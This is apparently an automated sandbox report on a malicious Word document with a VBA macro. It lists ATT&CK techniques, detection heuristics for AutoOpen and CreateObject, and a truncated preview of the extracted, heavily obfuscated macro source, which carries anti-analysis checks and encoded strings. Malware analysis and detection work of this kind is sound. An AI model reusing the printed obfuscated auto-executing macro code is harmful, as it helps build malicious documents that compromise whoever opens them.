Verdict: MALICIOUS
Risk Score: 162

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro calls CreateObject, a common technique for executing arbitrary code, and is triggered by the AutoOpen function. The script is heavily obfuscated, but its intent is to execute further malicious actions, most likely downloading a second-stage payload. The only embedded URL is benign, so no IOCs are derived from it.
Heuristics (6)

- VBA macros detected (severity: medium, 3 related findings), rule OLE_VBA_MACROS: Document contains VBA macro code.
- AutoOpen macro (severity: high), rule OLE_VBA_AUTOOPEN: AutoOpen macro.
- CreateObject call (severity: high), rule OLE_VBA_CREATEOBJ: CreateObject call.
- VBA p-code auto-exec with execution tokens (severity: high), rule OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (severity: medium), rule OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (severity: info), rule EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body).
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 188093 bytes |

SHA-256 (macros.bas): d244ebd035831bd8d5f2835545e5ede4768d02dd596d0f80903230a97e0ce0ad
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "VDxfw4"
Public Function ofqEb3OpKICBH8I(ByRef ACBs21F6upVl8I As String, ByRef THREE As String) As String
Dim NxeCtfUcJqi5ZFS() As Byte
If Application.UserName = "R1dOIhE6d92" Then
MsgBox ("yWnBrsUFGfO")
Else
Dim gLcI7hOkkMP4aS As Integer
End If
Dim Nbdy79aISzGMQqjt9B() As Byte
Dim da2edBOdvcwAXy As Integer
Dim kLZMBlpdi0n As String
da2edBOdvcwAXy = 1372
Dim iuIOCSlEm12 As Integer
kLZMBlpdi0n = Right(CStr(da2edBOdvcwAXy), Chr(Tan(CDbl(1.55039099610836))))
iuIOCSlEm12 = CInt(kLZMBlpdi0n)
For H1ht78t58Nf = iuIOCSlEm12 To 79
da2edBOdvcwAXy = da2edBOdvcwAXy + 9
Next H1ht78t58Nf
Dim EFodG0xujhIRRg As Long
Dim pHpDBWcKfGHpHE As Integer
Dim J15m7t1ITzd As String
pHpDBWcKfGHpHE = 9744
Dim nJffHpXNr50 As Integer
J15m7t1ITzd = Right(CStr(pHpDBWcKfGHpHE), Chr(Tan(CDbl(1.55039099610836))))
nJffHpXNr50 = CInt(J15m7t1ITzd)
For Pr8BmfyUJHd = nJffHpXNr50 To 42
pHpDBWcKfGHpHE = pHpDBWcKfGHpHE + 5
Next Pr8BmfyUJHd
Dim fqJU0NM9TwePb4 As Integer
For EOrNvIbV7Os = 1 To 19
fqJU0NM9TwePb4 = EOrNvIbV7Os
Next EOrNvIbV7Os
Dim uepUL5G5KLogLr As Integer
For VeaNa85QSS7 = 8 To 83
uepUL5G5KLogLr = VeaNa85QSS7
Next VeaNa85QSS7
Dim wytbuHPaWDNLOn, v2wbpsuNsQ2 As Integer
wytbuHPaWDNLOn = 3
v2wbpsuNsQ2 = 6
#If Up4wvLyLJ57 <> 0 Then
Up4wvLyLJ57 = Up4wvLyLJ57 + 6
Dim k8tS89l2DGE As Variant
Else
Dim k8tS89l2DGE As Object
#End If
If wytbuHPaWDNLOn > v2wbpsuNsQ2 Then
For Q4a0257vsGdiVb = v2wbpsuNsQ2 To wytbuHPaWDNLOn
v2wbpsuNsQ2 = v2wbpsuNsQ2 / wytbuHPaWDNLOn
Next Q4a0257vsGdiVb
End If
If Application.UserName = "g0ipUwCG2IU" Then
MsgBox ("AXHl7mWvTDS")
Else
Dim PqjfwpfG5ZUgEY As Integer
End If
Dim kKvOTR2vnMPeqcB As String
kKvOTR2vnMPeqcB = Application.UserName
Dim te98jBpWW01RXRJ9U, ZdN5rA14c41Fpe4Dnhi As Integer
ZdN5rA14c41Fpe4Dnhi = Len(kKvOTR2vnMPeqcB)
Dim pplHZjH33gvSsSSS As Collection
While ZdN5rA14c41Fpe4Dnhi > 1
te98jBpWW01RXRJ9U = te98jBpWW01RXRJ9U + 5
ZdN5rA14c41Fpe4Dnhi = ZdN5rA14c41Fpe4Dnhi - 1
Wend
Dim zoyUi4BqiTALp3Y As Collection
Set zoyUi4BqiTALp3Y = New Collection
zoyUi4BqiTALp3Y.Add "xqJoBpUSlcsMLQcn7x6QjxzZAj5LaiNUw3jWIbw57HNiMWJyCez74mbA2tobuI1COYZSrFegCATblONnaGJ6vQaJbid"
zoyUi4BqiTALp3Y.Add "UKyPKUy60H69R43S9YogABo95R87Q0ImGsrxfLb4Zrj9N6eV"
zoyUi4BqiTALp3Y.Add "cKy1wSgyU2V0q98T3iMDwy7uHTcow9zmbZY8zO6ZTr1iiiBkA3C5JcEnNE"
zoyUi4BqiTALp3Y.Add "02BUFsYRkAgolzuF7YLiS1n361d9VvutediapgdxKt9AXYUVr8qx2LK8OIYNPZ5xPwKIOTab5WY"
zoyUi4BqiTALp3Y.Add "ngihIRWE50SSjMgHQkuyKukNLGXiP3gzmGkm0pHHjuU620pH3Tpvnur26U"
zoyUi4BqiTALp3Y.Add "4yxBUfpdl4RkdmOZanVUbQo6OuJ2YsqfSFNv5SmXK"
zoyUi4BqiTALp3Y.Add "9BESBfScS9BknJ3zjVzF3NwRX"
zoyUi4BqiTALp3Y.Add "eHB7KQvp5KbIWGPXfRfjlBfCBWGlvOw4lCzURB1T2e8nH"
zoyUi4BqiTALp3Y.Add "9n0QA2x1cl86zJJ4qXhgTS5Gd"
Dim lI5vwJvkxyLPmSD As Long
Dim ia69O7LHhljoG7 As Integer
Dim yug4YNpJNnG As String
ia69O7LHhljoG7 = 1568
Dim mBFm5whZJEt As Integer
yug4YNpJNnG = Right(CStr(ia69O7LHhljoG7), Chr(Tan(CDbl(1.55039099610836))))
mBFm5whZJEt = CInt(yug4YNpJNnG)
For AMkbL3Z6M9N = mBFm5whZJEt To 98
ia69O7LHhljoG7 = ia69O7LHhljoG7 + 3
Next AMkbL3Z6M9N
Dim QXZnxFazliF9yL As Object
Dim oe7j4UAnwas9NZ3A As Long
If Chr(Tan(CDbl(1.55728363578157))) = J Then
Dim fYxMe43xqhhWkv As String
Dim YyMmo7qLcRw As String
YyMmo7qLcRw = C9O6k4KP2dj
fYxMe43xqhhWkv = nOoVTyk3AVb
End If
If (StrComp(fYxMe43xqhhWkv, YyMmo7qLcRw, vbTextCompare) <> 0) Then
MsgBox ("YCxYl0gdZ6iZa5")
End If
If Chr(Tan(CDbl(1.5563045877294))) = E Then
Dim QUtZDmNxOao5dQ As String
Dim hOtLHwanh2k As String
hOtLHwanh2k = qYQ7yZcv4TC
QUtZDmNxOao5dQ = TSORxIt197G
End If
If (StrComp(QUtZDmNxOao5dQ, hOtLHwanh2k, vbTextCompare) <> 0) Then
MsgBox ("OnM2UEVvqw0yOO")
End If
If Chr(Tan(CDbl(1.5554129250143))) = A Then
Dim gPgd9C2RT0ywhU As String
Dim BVbYOYewG8L As String
BVbYOYewG8L = bIUGe7zu
... (truncated)